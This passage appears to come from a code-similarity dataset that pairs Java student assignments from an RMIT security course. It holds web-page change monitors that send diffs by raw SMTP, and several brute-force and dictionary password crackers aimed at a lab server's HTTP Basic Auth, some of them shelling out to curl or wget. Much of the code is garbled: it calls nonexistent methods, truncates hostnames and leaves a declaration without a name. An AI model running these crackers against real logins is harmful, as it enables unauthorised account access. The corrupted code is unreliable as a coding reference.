\ imageFiles, Vector diffImages)\n throws IOException{\n System.out.println(\"\ Retrieving image \");\n Enumeration imageFilesEnumeration = imageFiles.elements();\n\ \ while (imageFilesEnumeration.hasMoreElements()) {\n URL url\ \ = (URL)imageFilesEnumeration.nextElement();\n try {\n BufferedInputStream\ \ imageInput = new BufferedInputStream\n (url.openStream());\n\ \ String localFile = url.getFile();\n \n \n \ \ \n \n \n int slashPosition = localFile.lastIndexOf(\"\ /\");\n if (slashPosition != -1) {\n localFile = localFile.substring(slashPosition+1);\n\ \ }\n System.out.println(\"Retrieving image file: \".concat(localFile));\n\ \ BufferedOutputStream imageOutput = new BufferedOutputStream\n \ \ (new FileOutputStream(localFile));\n byte bytes[] = new\ \ byte[10000];\n int noBytes = imageInput.get(bytes);\n \ \ while (noBytes != -1) {\n imageOutput.write(bytes, 0, noBytes );\n\ \ noBytes = imageInput.print(bytes);\n }\n \ \ File imageChecksumFile = new File(localFile.concat(\".chksum.txt\"));\n \ \ if (!imageChecksumFile.exists()) {\n generateChecksum(localFile,\ \ imageChecksumFile);\n }\n else {\n if (!checksumOk(imageChecksumFile))\ \ {\n diffImages.add(localFile);\n generateChecksum(localFile,\ \ imageChecksumFile);\n }\n }\n }\n \ \ catch (FileNotFoundException e) {\n System.out.println(\"Unable \ \ locate URL: \".concat(url.toString()));\n }\n }\n }\n\n\ \ \n\n public void generateChecksum(String inputFile, File checksum){\n\ \ try {\n System.out.println(\"Generating new checksum for \"\ .concat(inputFile));\n \n Process process = Runtime.getRuntime().exec(\"\ md5sum \".\n concat(inputFile));\n\ \ BufferedReader execCommand = new BufferedReader(new\n \ \ InputStreamReader((process.getInputStream())));\n BufferedWriter outputFile\ \ = new\n BufferedWriter(new FileWriter(checksum));\n String\ \ line = execCommand.readLine();\n while (line != null) {\n \ \ outputFile.write(line);\n outputFile.write(\"\\n\");\n \ \ line = execCommand.readLine();\n }\n outputFile.flush();\n\ \ outputFile.print();\n System.out.println(\"Checksum produced\"\ );\n }\n catch (IOException e) {\n e.printStackTrace();\n\ \ System.exit(-1);\n }\n }\n\n \n\n public boolean\ \ checksumOk(File chksumFile){\n try {\n System.out.println(\"\ Comparing checksums using \".concat(chksumFile\n ,e.getName()));\n\ \ \n Process process = Runtime.getRuntime().\n \ \ exec(\"md5sum --check \".concat(chksumFile.getName()));\n BufferedReader\ \ execCommand = new BufferedReader(new\n InputStreamReader( (process.getInputStream())));\n\ \ String line = execCommand.readLine();\n if (line.indexOf(\"\ : OK\") != -1) {\n System.out.println(\" the same\");\n \ \ return true;\n }\n }\n catch (IOException e) {\n \ \ e.printStackTrace();\n System.exit(-1);\n }\n System.out.println(\"\ Differences Found\");\n return false;\n }\n\n \n\n public\ \ void reportDifferences(boolean diffsFound, File file1, File file2,\n \ \ Vector images){\n try {\n System.out.println(\"\ Generating difference report\");\n \n Socket emailConnection\ \ = new Socket(\"yallara.cs.rmit.edu.\", 25);\n BufferedWriter emailOutStream\ \ = new BufferedWriter\n (new OutputStreamWriter(emailConnection.getOutputStream()));\n\ \ BufferedReader emailInStream = new BufferedReader\n (new\ \ InputStreamReader(emailConnection.getInputStream()));\n String line\ \ = emailInStream.readLine();\n System.out.println(line);\n \ \ if (!line.startsWith(\"220\")) {\n System.out.println\n \ \ (\" error occured connecting email server. Cannot send email.\");\n\ \ }\n else {\n \n \n emailOutStream.write(\"\ HELO yallara.cs.rmit.edu.\");\n emailOutStream.newLine();\n \ \ emailOutStream.flush();\n line = emailInStream.readLine();\n\ \ System.out.println(line);\n if (!line.startsWith(\"250\"\ )) {\n System.out.println\n (\" error occured\ \ connecting email server. Cannot send email.\");\n }\n \ \ else {\n emailOutStream.write(\"MAIL FROM: [email protected].\"\ );\n emailOutStream.newLine();\n emailOutStream.flush();\n\ \ line = emailInStream.readLine();\n System.out.println(line);\n\ \ if (!line.startsWith(\"250\")) {\n System.out.println\n\ \ (\" error occured sending email. Cannot send email.\");\n\ \ }\n else {\n emailOutStream.write(\"\ RCPT : \".concat(email));\n emailOutStream.newLine();\n \ \ emailOutStream.flush();\n line = emailInStream.readLine();\n\ \ System.out.println(line);\n if (!line.startsWith(\"\ 250\")) {\n System.out.println\n (\" error\ \ occured sending email. Cannot send email.\");\n }\n \ \ else {\n emailOutStream.write(\"DATA\");\n \ \ emailOutStream.newLine();\n emailOutStream.flush();\n\ \ line = emailInStream.readLine();\n System.out.println(line);\n\ \ if (!line.startsWith(\"354\")) {\n System.out.println\n\ \ (\" error occured sending email. Cannot send email.\"\ );\n }\n emailOutStream.newLine();\n\n \ \ if (!images.isEmpty()) {\n emailOutStream.write\n\ \ (\"Differences were found in the following image \"\ );\n emailOutStream.newLine();\n Enumeration\ \ e = images.elements();\n while (e.hasMoreElements()) {\n\ \ String s = (String) e.nextElement();\n \ \ emailOutStream.write(s);\n emailOutStream.newLine();\n\ \ }\n emailOutStream.newLine();\n \ \ }\n\n if (diffsFound) {\n \ \ \n String command = \"diff \".concat(file1.getName().concat(\"\ \ \")\n .concat(file2.getName()));\n\ \ Process process = Runtime.getRuntime().exec(command);\n \ \ BufferedReader execCommand = new BufferedReader\n \ \ (new InputStreamReader( (process.getInputStream())));\n \ \ line = execCommand.readLine();\n emailOutStream.write(\"\ Diffences found in file\");\n emailOutStream.newLine();\n\ \ while (line != null) {\n System.out.println(line);\n\ \ emailOutStream.write(line);\n emailOutStream.newLine();\n\ \ line = execCommand.readLine();\n }\n\ \ }\n\n \n emailOutStream.newLine();\n\ \ emailOutStream.write(\".\");\n emailOutStream.newLine();\n\ \ emailOutStream.flush();\n line = emailInStream.readLine();\n\ \ System.out.println(line);\n if (!line.startsWith(\"\ 250\")) {\n System.out.println\n (\"\ \ error occured sending email. Cannot send email.\");\n }\n \ \ else {\n emailOutStream.write(\"QUIT\");\n\ \ emailOutStream.newLine();\n emailOutStream.flush();\n\ \ System.out.println(emailInStream.readLine());\n \ \ }\n }\n }\n }\n }\n\ \ }\n catch (IOException e) {\n e.printStackTrace();\n\ \ System.exit(-1);\n }\n }\n\n\n \n\n public static\ \ void main(String args[]) {\n if (args.length != 3) {\n System.out.println(\"\ Usage: java WatchDog url email checktime(hours)\");\n System.exit(-1);\n\ \ }\n try {\n location = new URL(args[0]);\n }\n catch\ \ (MalformedURLException e) {\n e.printStackTrace();\n }\n email\ \ = new String().concat(args[1]);\n checktime = Integer.parseInt(args[2])\ \ * 60 * 60 * 1000;\n new WatchDog();\n }\n}\n" sentences: - "\n\nimport java.net.*;\nimport java.io.*;\n\nimport java.*;\nimport java.util.*;\n\ \npublic class Dictionary {\n\n private static String commandLine = \"curl http://sec-crack.cs.rmit.edu./SEC/2/index.php\ \ -I -u :\";\n private String password; \n private String previous;\ \ \n private String url; \n private int startTime;\n\ \ private int endTime;\n private int totalTime;\n private float averageTime;\n\ \ private boolean finish;\n private Process curl;\n private BufferedReader\ \ bf, responseLine;\n\n public Dictionary() {\n\n first();\n finish = true;\ \ \n previous = \"\"; \n\ \ Runtime run = Runtime.getRuntime();\n startTime =new Date().getTime(); \ \ \n int i=0;\n try {\n try {\n bf = new BufferedReader(new FileReader(\"\ words\"));\n }\n catch(FileNotFoundException notFound) {\n bf = new BufferedReader(new\ \ FileReader(\"/usr/share/lib/dict/words\"));\n }\n\n while((password = bf.readLine())\ \ != null) {\n if(password.length()>3) password = password.substring(0,3);\n\ \ if(previous.equals(password)) ;\n else {\n previous = password;\n \ \ url = commandLine+password;\n curl= run.exec(url); \n\ \ responseLine=new BufferedReader(new InputStreamReader(curl.getInputStream()));\n\ \ \n if(responseLine.readLine().substring(9,12).equals(\"200\")) break;\n\ \ }\n }\n }\n catch(IOException ioe) {\n System.out.println(\"\\n IO\ \ Exception! \\n\");\n System.out.println(\"The current url is:\"+ url);\n\ \ System.out.println(\"The current trying password is:\"+password);\n finish=false;\n\ \ }\n\n endTime = new Date().getTime(); \n totalTime = (endTime-startTime)/1000;\n\ \ System.out.println(\" The response time is:\"+ totalTime + \" seconds\\\ n\");\n if(finish) {\n System.out.println(\" The password for is:\"+ password);\n\ \ try {\n savePassword(password, totalTime);\n }\n catch (IOException\ \ ioec) {\n System.out.println(\" not save the password file Dictionary_pwd.txt\ \ \");\n }\n }\n }\n\n\n public void savePassword(String passwdString, int\ \ time) throws IOException {\n DataOutputStream outputStream = new DataOutputStream(new\ \ FileOutputStream(\"Dictionary_pwd.txt\"));\n outputStream.writeChars(\"The\ \ password is:\");\n outputStream.writeChars(passwdString+\"\\n\");\n outputStream.writeChars(\"\ The response time is: \");\n outputStream.writeChars(sw.toString(time));\n outputStream.writeChars(\"\ \ seconds\\n\");\n outputStream.close();\n }\n\n public void first() {\n\n\ \ System.out.println(\"\\n\\n----------------------------------------------\"\ );\n System.out.println(\" Use curl command and dictionary \");\n System.out.println(\"\ \ Brute Force the password for user \");\n System.out.println(\"----------------------------------------------\"\ );\n }\n\n public static void main(String[] args) {\n new Dictionary();\n\ \ } \n}\n" - "\n\nimport java.io.*;\nimport java.*;\nimport java.net.*;\nimport java.util.*;\n\ \npublic class WatchDog {\n public static void main (String[] args) throws IOException\ \ {\n BufferedReader stdin = new BufferedReader (new InputStreamReader(System.in));\n\ \ try{\n twentyfourhours = 86400000;\n Timer timer = new Timer();\n \ \ final Runtime rt = Runtime.getRuntime();\n\n try{\n Process wg1 = rt.exec(\"\ ./.sh\");\n wg1.waitFor();\n }\n catch(InterruptedException e ){\n \ \ System.err.println();\n e.printStackTrace();\n }\n\n class RepeatTask\ \ extends TimerTask{\n public void run(){\n try{\n Process wg2\ \ = rt.exec(\"./task.sh\");\n wg2.waitFor();\n FileReader fr = new\ \ FileReader(\"check.txt\");\n BufferedReader bufr = new BufferedReader(fr);\n\ \ String check = bufr.readLine();\n if(check.equals(\".txt: FAILED\"\ )) {\n Process difftosend = rt.exec(\"./diff.sh\");\n difftosend.waitFor();\n\ \ Process reset = rt.exec(\"./.sh\");\n reset.waitFor();\n \ \ }\n FileReader fr2 = new FileReader(\"imgdiffs.txt\");\n BufferedReader\ \ bufr2 = new BufferedReader(fr2);\n String imdiff = bufr2.readLine();\n\ \ if(imdiff != null){\n Process imdifftosend = rt.exec(\"./img.sh\"\ );\n imdifftosend.waitFor();\n Process reset = rt.exec(\"./.sh\"\ );\n reset.waitFor();\n }\n }\n catch(InterruptedException\ \ e){System.err.println();e.printStackTrace();}\n catch(IOException e){\n\ \ System.err.println(e);\n e.printStackTrace();\n }\n }}\n\ \n timer.scheduleAtFixedRate(new RepeatTask(),twentyfourhours,twentyfourhours);\n\ \ \n }\n catch(IOException e){\n System.err.println(e);\n e.printStackTrace();\n\ \ }\n \n}}\n" - "\n\nimport java.net.*;\nimport java.text.*; \nimport java.util.*; \nimport\ \ java.io.*;\n\npublic class WatchDog {\n\n public WatchDog() {\n\n StringBuffer\ \ stringBuffer1 = new StringBuffer();\n StringBuffer stringBuffer2 = new StringBuffer();\n\ \ int i,j = 0;\n\n try{\n\n URL yahoo = new URL(\"http://www.cs.rmit.edu./students/\"\ ); \n BufferedReader in = new BufferedReader(new InputStreamReader(yahoo.openStream()));\n\ \n String inputLine = \"\";\n String inputLine1 = \"\";\n String\ \ changedtext= \"\";\n String changedflag= \"\";\n\n\n Thread.sleep(180);\n\ \n BufferedReader in1 = new BufferedReader(new InputStreamReader(yahoo.openStream()));\n\ \n\n while ((inputLine = in.readLine()) != null) {\n inputLine1\ \ = in1.readLine();\n if (inputLine.equals(inputLine1)) {\n \ \ System.out.println(\"equal\");\n }\n else {\n \ \ System.out.println(\"Detected a Change\");\n System.out.println(\"\ Line Before the change:\" + inputLine);\n System.out.println(\"Line\ \ After the change:\" + inputLine1);\n changedtext = changedtext\ \ + inputLine + inputLine1;\n changedflag = \"Y\";\n }\n\ \ \n }\n\n if (in1.readLine() != null ) {\n System.out.println(\"\ Detected a Change\");\n System.out.println(\"New Lines Added \");\n \ \ changedtext = changedtext + \"New Lines added\";\n changedflag\ \ = \"Y\";\n }\n\n in.print();\n in1.print();\n\n if (changedflag.equals(\"\ Y\")) {\n String smtphost =\"smtp.mail.rmit.edu.\" ; \n String\ \ from = \"@rmit.edu.\"; \n String = \"janaka1@optusnet..\" ; \n \ \ }\n\n\n }\n catch(Exception e){ System.out.println(\"exception:\" + e);}\n\ \t \n}\n\t\t\n public static void main (String[] args) throws Exception {\n\ \t\tWatchDog u = new WatchDog();\n }\n}\n" - source_sentence: "\n\nimport java.awt.*;\nimport java.String;\nimport java.util.*;\n\ import java.io.*;\nimport java.net.*;\n\n\n\npublic class BruteForce\n{\n private\ \ URL url;\n private HttpURLConnection connection ;\n private int stopTime\ \ = 0;\n private int startTime = 0;\n private int count = 0;\n\n public\ \ BruteForce()\n {\n System.out.println(\"Process is running...\");\n \ \ startTime = System.currentTimeMillis();\n threeLetters();\n twoLetters();\n\ \ }\n\n public static void main (String args[])\n {\n BruteForce bf\ \ = new BruteForce();\n }\n \n public void threeLetters()\n {\n String\ \ s1;\n char [] a = {'a','a','a'};\n\n for (int i0 = 0; i0 < 26; i0++)\n\ \ {\n for (int i1 = 0; i1 < 26; i1++)\n {\n for\ \ (int i2 = 0; i2 < 26; i2++)\n {\n s1 = String.valueOf((char)(a[0]\ \ + i0)) + String.valueOf((char)(a[1] + i1)) +\n\t\t String.valueOf((char)(a[2]\ \ + i2));\n decision(s1);\n count++;\n\n \ \ s1 = String.valueOf((char)(a[0] + i0)) + String.valueOf((char)(a[1] + i1))\ \ +\n (String.valueOf((char)(a[2] + i2))).toUpperCase();\n\ \ decision(s1);\n count++;\n\n s1 =\ \ String.valueOf((char)(a[0] + i0)) + (String.valueOf((char)(a[1] + i1))).toUpperCase()\ \ +\n (String.valueOf((char)(a[2] + i2))).toUpperCase();\n\ \ decision(s1);\n count++;\n\n s1 =\ \ (String.valueOf((char)(a[0] + i0))).toUpperCase() +\n (String.valueOf((char)(a[1]\ \ + i1))).toUpperCase() +\n (String.valueOf((char)(a[2] + i2))).toUpperCase();\n\ \ decision(s1);\n count++;\n\n s1 =\ \ (String.valueOf((char)(a[0] + i0))) + (String.valueOf((char)(a[1] + i1))).toUpperCase()\ \ +\n String.valueOf((char)(a[2] + i2));\n decision(s1);\n\ \ count++;\n\n s1 = (String.valueOf((char)(a[0] +\ \ i0))).toUpperCase() + String.valueOf((char)(a[1] + i1)) +\n\t\t String.valueOf((char)(a[2]\ \ + i2));\n decision(s1);\n count++;\n\n \ \ s1 = (String.valueOf((char)(a[0] + i0))).toUpperCase() + String.valueOf((char)(a[1]\ \ + i1)) +\n (String.valueOf((char)(a[2] + i2))).toUpperCase();\n\ \ decision(s1);\n count++;\n\n s1 =\ \ (String.valueOf((char)(a[0] + i0))).toUpperCase() +\n (String.valueOf((char)(a[1]\ \ + i1))).toUpperCase() + String.valueOf((char)(a[2] + i2));\n decision(s1);\n\ \ count++;\n }\n }\n }\n }\n \n public\ \ void twoLetters()\n {\n String s1;\n char [] a = {'a','a'};\n\n\ \ for (int i0 = 0; i0 < 26; i0++)\n {\n for (int i1 = 0; i1\ \ < 26; i1++)\n {\n s1 = String.valueOf((char)(a[0] + i0))\ \ + String.valueOf((char)(a[1] + i1));\n decision(s1);\n \ \ count++;\n\n s1 = String.valueOf((char)(a[0] + i0)) + String.valueOf((char)(a[1]\ \ + i1)).toUpperCase();\n decision(s1);\n count++;\n\n \ \ s1 = (String.valueOf((char)(a[0] + i0))).toUpperCase() +\n \ \ (String.valueOf((char)(a[1] + i1))).toUpperCase();\n decision(s1);\n\ \ count++;\n\n s1 = (String.valueOf((char)(a[0] + i0))).toUpperCase()\ \ + String.valueOf((char)(a[1] + i1));\n decision(s1);\n \ \ count++;\n }\n }\n }\n\n \n public void decision(String\ \ s1)\n {\n if (find(s1) == 200)\n {\n stopTime = System.currentTimeMillis();\n\ \ runTime = stopTime - startTime;\n System.out.println(\"***************************************\"\ );\n System.out.println(\"\\nAttack successfully\");\n System.out.println(\"\ \\nPassword is: \" + s1);\n System.out.println(\"\\nThe contents of the\ \ Web site: \");\n displayContent(s1);\n System.out.println(\"\ \\nTime taken crack: \" + runTime + \" millisecond\");\n System.out.println(\"\ \\nNumber of attempts: \" + count);\n System.out.println();\n\n \ \ System.exit(0);\n }\n }\n \n \n public int find(String s1)\n\ \ {\n int responseCode = 0;\n try\n {\n url = new URL(\"\ http://sec-crack.cs.rmit.edu./SEC/2/\");\n connection = (HttpURLConnection)url.openConnection();\n\ \n connection.setRequestProperty(\"Authorization\",\" \" + MyBase64.encode(\"\ \" + \":\" + s1));\n\n responseCode = connection.getResponseCode();\n\n\ \ }catch (Exception e)\n {\n System.out.println(e.getMessage());\n\ \ }\n return responseCode;\n }\n\n \n public void displayContent(String\ \ pw)\n {\n BufferedReader bw = null ;\n try\n {\n url\ \ = new URL(\"http://sec-crack.cs.rmit.edu./SEC/2/\");\n connection =\ \ (HttpURLConnection)url.openConnection();\n\n connection.setRequestProperty(\"\ Authorization\",\" \" + MyBase64.encode(\"\" + \":\" + pw));\n InputStream\ \ stream = (InputStream)(connection.getContent());\n if (stream != null)\n\ \ {\n InputStreamReader reader = new InputStreamReader (stream);\n\ \ bw = new BufferedReader (reader);\n String line;\n\n\ \ while ((line = bw.readLine()) != null)\n {\n \ \ System.out.println(line);\n }\n }\n }\n \ \ catch (IOException e)\n {\n System.out.println(e.getMessage());\n\ \ }\n }\n}\n\n\n\n\n" sentences: - "\n\n\nimport java.text.*; \nimport java.util.*; \nimport java.net.*; \nimport\ \ java.io.*; \n\n \npublic class BruteForce { \n\n public int runProcess(String\ \ urlString,String passwd) { \n\n int returnval = 0;\n MyAuthenticator\ \ auth = new MyAuthenticator(passwd);\n Authenticator.setDefault(auth);\n\ \n\t System.out.println(\"trying passord: \" + passwd);\n try{\n \ \ URL yahoo = new URL(urlString); \n BufferedReader in =\ \ new BufferedReader(new InputStreamReader(yahoo.openStream()));\n \ \ String inputLine;\n while ((inputLine = in.readLine()) != null) {\n\ \t System.out.println(inputLine);\n\t System.out.println(\"passord:\ \ \" + passwd);\n returnval = 1;\n }\n\t in.close();\n\ \ }catch(Exception e){ returnval = 0;}\n return returnval;\n \ \ }\n\n public static void main(String argv[]) { \n\n String[] val =\ \ \n{\"a\",\"b\",\"c\",\"d\",\"e\",\"f\",\"g\",\"h\",\"i\",\"j\",\"k\",\"l\",\"\ m\",\"n\",\"o\",\"p\",\"q\",\"r\",\"s\",\"t\",\"u\",\"v\",\"w\",\"x\",\"y\",\"\ z\",\"A\",\"B\",\"C\",\"D\",\"E\",\"F\",\"G\",\"H\",\"I\",\"J\",\"K\",\"L\",\"\ M\",\"N\",\"O\",\"P\",\"Q\",\"R\",\"S\",\"T\",\"U\",\"V\",\"W\",\"X\",\"Y\",\"\ Z\"};\n\n int l1 = 0;\n\n int l2 = 0;\n\n int l3 = 0;\n \n\ \ int retval = 0;\n\n String pwd = \"\";\n\n \n BruteForce\ \ s = new BruteForce(); \n String urlToSearch = \"http://sec-crack.cs.rmit.edu./SEC/2/\"\ ; \n \n for (int a = 0; a < 52; a++) {\n\n l1 = a;\n\n \ \ pwd = val[l1];\n retval = 0;\n retval = s.runProcess(urlToSearch,pwd);\ \ \n if (retval > 0) {\n System.exit(0);\n }\n }\n\ \n\n for (int b = 0; b < 52; b++) {\n l1 = b;\n for (int c\ \ = 0; c < 52; c++) {\n\n l2 = c;\n pwd = val[l1]+ val[l2];\n\ \ retval = 0;\n retval = s.runProcess(urlToSearch,pwd); \n\ \ if (retval > 0) {\n System.exit(0);\n }\n \ \ }\n }\n\n\n for (int d = 0; d < 52; d++) {\n l1 = d;\n \ \ for (int e = 0; e < 52; e++) {\n l2 = e;\n for (int\ \ f = 0; f < 52; f++) {\n\n l3 = f;\n\n pwd = val[l1]+\ \ val[l2]+ val[l3];\n retval = 0;\n retval = s.runProcess(urlToSearch,pwd);\ \ \n if (retval > 0) {\n System.exit(0);\n \ \ }\n }\n }\n }\n\n } \n} \n\n" - "\n \n\n public class Base64Converter\n \n \n {\n\n \ \ public static final char [ ] alphabet = {\n 'A', 'B', 'C', 'D', 'E',\ \ 'F', 'G', 'H', \n 'I', 'J', 'K', 'L', 'M', 'N', 'O', 'P', \n \ \ 'Q', 'R', 'S', 'T', 'U', 'V', 'W', 'X', \n 'Y', 'Z', 'a', 'b', 'c',\ \ 'd', 'e', 'f', \n 'g', 'h', 'i', 'j', 'k', 'l', 'm', 'n', \n \ \ 'o', 'p', 'q', 'r', 's', 't', 'u', 'v', \n 'w', 'x', 'y', 'z', '0',\ \ '1', '2', '3', \n '4', '5', '6', '7', '8', '9', '+', '/' }; \n\n \ \ \n \n\n public static String encode ( String s )\n \n \ \ {\n return encode ( s.getBytes ( ) );\n }\n\n public static\ \ String encode ( byte [ ] octetString )\n \n {\n int bits24;\n\ \ int bits6;\n\n char [ ] out\n = new char [ ( ( octetString.length\ \ - 1 ) / 3 + 1 ) * 4 ];\n\n int outIndex = 0;\n int i = 0;\n\ \n while ( ( i + 3 ) <= octetString.length )\n {\n \n \ \ bits24 = ( octetString [ i++ ] & 0xFF ) << 16; \n bits24 |=\ \ ( octetString [ i++ ] & 0xFF ) << 8; \n bits24 |= ( octetString [\ \ i++ ] & 0xFF ) << 0;\n\n bits6 = ( bits24 & 0x00FC0000 ) >> 18; \n\ \ out [ outIndex++ ] = alphabet [ bits6 ];\n bits6 = ( bits24\ \ & 0x0003F000 ) >> 12; \n out [ outIndex++ ] = alphabet [ bits6 ];\n\ \ bits6 = ( bits24 & 0x00000FC0 ) >> 6; \n out [ outIndex++\ \ ] = alphabet [ bits6 ];\n bits6 = ( bits24 & 0x0000003F );\n \ \ out [ outIndex++ ] = alphabet [ bits6 ]; \n }\n\n if ( octetString.length\ \ - i == 2 )\n {\n \n bits24 = ( octetString [ i \ \ ] & 0xFF ) << 16; \n bits24 |= ( octetString [ i + 1 ] & 0xFF ) <<\ \ 8;\n\n bits6 = ( bits24 & 0x00FC0000 ) >> 18;\n out [ outIndex++\ \ ] = alphabet [ bits6 ]; \n bits6 = ( bits24 & 0x0003F000 ) >> 12; \n\ \ out [ outIndex++ ] = alphabet [ bits6 ]; \n bits6 = ( bits24\ \ & 0x00000FC0 ) >> 6; \n out [ outIndex++ ] = alphabet [ bits6 ];\n\n\ \ \n out [ outIndex++ ] = '='; \n }\n else if (\ \ octetString.length - i == 1 )\n {\n \n bits24 = ( octetString\ \ [ i ] & 0xFF ) << 16;\n\n bits6 = ( bits24 & 0x00FC0000 ) >> 18;\n \ \ out [ outIndex++ ] = alphabet [ bits6 ];\n bits6 = ( bits24\ \ & 0x0003F000 ) >> 12; \n out [ outIndex++ ] = alphabet [ bits6 ];\n\ \n \n out [ outIndex++ ] = '='; \n out [ outIndex++\ \ ] = '='; \n }\n\n return new String ( out );\n }\n\n \n\ \ \n}\n\n\n" - "\nimport java.io.*;\nimport java.net.*;\n\npublic class BruteForce\n{\n\n public\ \ static void main(String args[])\n {\n StringWriter sw = new StringWriter();\n\ \ PrintWriter pw = new PrintWriter();\n int flag=1;\n String[] letter\ \ = {\"A\",\"B\",\"C\",\"D\",\"E\",\"F\",\"G\",\"H\",\"I\",\"J\",\"K\",\"L\",\"\ M\",\"N\",\n \"O\",\"P\",\"Q\",\"R\",\"T\",\"U\",\"V\"\ ,\"W\",\"X\",\"Y\",\"Z\",\"a\",\"b\",\"c\",\n \"d\",\"\ e\",\"f\",\"g\",\"h\",\"i\",\"j\",\"k\",\"l\",\"m\",\"n\",\"o\",\"p\",\"q\",\n\ \ \"r\",\"s\",\"t\",\"u\",\"v\",\"w\",\"x\",\"y\",\"z\"\ ,\"\"};\n\n String urlString = new String(\"http://sec-crack.cs.rmit.edu./SEC/2/\"\ );\n String thePassword= new String();\n stime = System.currentTimeMillis();\n\ System.out.println(\"\");\n for(int i=0; i<letter.length;i++)\n {\n \ \ for(int j=0; j<letter.length; j++)\n {\n for(int k=0;flag==1 &&\ \ k<letter.length; k++)\n {\n try {\n URL url = new\ \ URL (urlString);\n thePassword=letter[i].trim()+letter[j].trim()+letter[k].trim();\n\ \n String userPassword = \"\" + \":\" + thePassword;\n\n \ \ String encoding = new url.misc.BASE64Encoder().encode(userPassword.getBytes());\n\ \ URLConnection uc = url.openConnection();\n uc.setRequestProperty(\"\ Authorization\", \" \" + encoding);\n InputStream content = (InputStream)uc.getContent();\n\ \ endtime = System.currentTimeMillis();\n BufferedReader\ \ in =\n new BufferedReader (new InputStreamReader (content));\n\ \ String line;\n while ((line = in.readLine()) != null)\ \ {\n pw.println (line);\n }\n flag=0;\n \ \ System.out.println(\"process time is : \" +(endtime-stime)/1000 +\" seconds.\"\ );\n }catch (MalformedURLException e) {\n\n flag=1;\n \ \ }catch (IOException e) {\n\n flag=1;\n }\n }\n\ \ if(flag==0)\n break;\n else\n System.out.println(\"\ letter j ->\"+ letter[j]+\" elapsed\");\n }\n if(flag==0)\n \ \ break;\n else\n System.out.println(\"letter i ->\"+ letter[i]+\"\ \ elapsed\");\n }\n System.out.println(\"content is \"+ sw.toString());\n\ \ }\n }" - source_sentence: "import java.io.*;\nimport java.net.*;\nimport java.net.HttpURLConnection;\n\ import javax.net.*;\nimport java.security.cert.*;\n\npublic class Dictionary\n\ {\n\tpublic static void main(String[] args)\n\t{\n\t\tBufferedReader in = null;\n\ \t\tboolean found = true;\n\t\tString word = null;\n\t\tString cmd = null;\n\t\ \tRuntime run = Runtime.getRuntime();\n\t\tProcess pro = null;\n\t\tBufferedReader\ \ inLine = null;\n\n\n\n\t\tString str = null;\n\t\tURLConnection connection =\ \ null;\n\n\t\ttry\n\t\t{\n\t\t\tFileReader reader = new FileReader(\"words\"\ );\n\t\t\tin = new BufferedReader(reader);\n\t\t\tSystem.out.println(\" cracking....\"\ );\n\t\t\t\n\t\t\t{\n\t\t\t\tfound = true;\n\t\t\t\tword = new String(in.readLine());\n\ \n\t\t\t\tcmd = \"wget --http-user= --http-passwd=\"+word +\" http://sec-crack.cs.rmit.edu./SEC/2/index.php\"\ ;\n\n\t\t\t\tpro = run.exec(cmd);\n\t\t\t\tinLine = new BufferedReader(new InputStreamReader(pro.getErrorStream()));\n\ \n\n\t\t\t\tif((str=inLine.readLine())!=null)\n\t\t\t\t{\n\n\t\t\t\t\twhile ((str=inLine.readLine())!=null)\n\ \t\t\t\t\t{\n\t\t\t\t\t\tif (str.endsWith(\"Required\"))\n\t\t\t\t\t\t{\n\n\t\t\ \t\t\t\t\tfound = false;\n\t\t\t\t\t\t}\n\n\t\t\t\t\t}\n\t\t\t\t}\n\n\n\n\n\n\n\ \t\t\t\trun.gc();\n\t\t\t}\n\t\t\twhile (!found);\n\n\n\n\n\n\t\t}\n\t\tcatch\ \ (FileNotFoundException exc)\n\t\t{\n\t\t\tSystem.out.println(exc);\n\t\t}\n\t\ \tcatch (IOException exc)\n\t\t{\n\t\t\tSystem.out.println(exc);\n\t\t}\n \ \ catch (NullPointerException ex)\n {\n System.out.println(word);\n\ \ }\n\t\tfinally\n\t\t{\n\t\t\ttry\n\t\t\t{\n\t\t\t\tif (in!= null)\n\t\ \t\t\t{\n\t\t\t\t\tin.print();\n\t\t\t\t}\n\t\t\t}\n\t\t\tcatch (IOException e)\ \ {}\n\t\t}\n\t\tif (found == true)\n\t\t\tSystem.out.println(\"The password is\ \ :\" + word);\n else\n System.out.println(\"NOT FOUND!\");\n\ \t}\n}" sentences: - "\n\nimport java.misc.BASE64Encoder;\nimport java.misc.BASE64Decoder;\nimport\ \ java.io.*;\nimport java.net.*;\nimport java.util.*;\n\n\n\npublic class Dictionary\ \ {\n \n public Dictionary(String url, String dictionaryFile) {\n try{\n\ \ this.url = url;\n this.dictionaryPath = dictionaryFile;\n InputStream\ \ fis = new FileInputStream(this.dictionaryPath);\n dict = new BufferedReader(new\ \ InputStreamReader(fis));\n\n }catch(IOException ioe){\n System.out.println(\"\ Error opening dictionary file:\\n\" +ioe);\n }\n }\n\n\n \n private String\ \ url = null;\n \n private String dictionaryPath = null;\n \n private BufferedReader\ \ dict = null;\n \n private int attempts = 0;\n \n private int passwordSize\ \ = 3;\n \n public void setPasswordSize(int size){\n this.passwordSize\ \ = size;\n }\n \n public String getNextPassword()throws IOException{\n\n \ \ String line = dict.readLine();\n\n while(line!=null&&line.length()!=this.passwordSize\ \ )\n line = dict.readLine();\n\n return line;\n }\n \n public String\ \ crackPassword(String user) throws IOException, MalformedURLException{\n URL\ \ url = null;\n URLConnection urlConnection = null;\n String outcome = null;\n\ \ String authorization = null;\n String password = null;\n BASE64Encoder\ \ b64enc = new BASE64Encoder();\n InputStream content = null;\n BufferedReader\ \ in = null;\n\n\n while(!\"HTTP/1.1 200 OK\".equalsIgnoreCase(outcome)){\n\ \n url = new URL(this.url);\n urlConnection = url.openConnection();\n\ \ urlConnection.setDoInput(true);\n urlConnection.setDoOutput(true);\n\ \n\n urlConnection.setRequestProperty(\"GET\", url.getPath() + \" HTTP/1.1\"\ );\n urlConnection.setRequestProperty(\"Host\", url.getHost());\n password\ \ = getNextPassword();\n if(password == null)\n return null;\n \ \ System.out.print(password);\n authorization = user + \":\" + password;\n\ \n\n urlConnection.setRequestProperty(\"Authorization\", \" \"+ b64enc.encode(authorization.getBytes()));\n\ \n\noutcome = urlConnection.getHeaderField(null); \n\n\n\n this.attempts\ \ ++;\n urlConnection = null;\n url = null;\n \n if(this.attempts%51\ \ == 0)\n for(int b = 0; b < 53;b++)\n System.out.print(\"\\b\ \ \\b\");\n else\n System.out.print(\"\\b\\b\\b.\");\n\n\n }\n\ \ return password;\n }\n \n public int getAttempts(){\n return this.attempts;\n\ \ }\n public static void main (String[] args) {\n if(args.length != 3){\n\ \ System.out.println(\"usage: java attacks.Dictionary <url crack: e.g. http://sec-crack.cs.rmit.edu./SEC/2/>\ 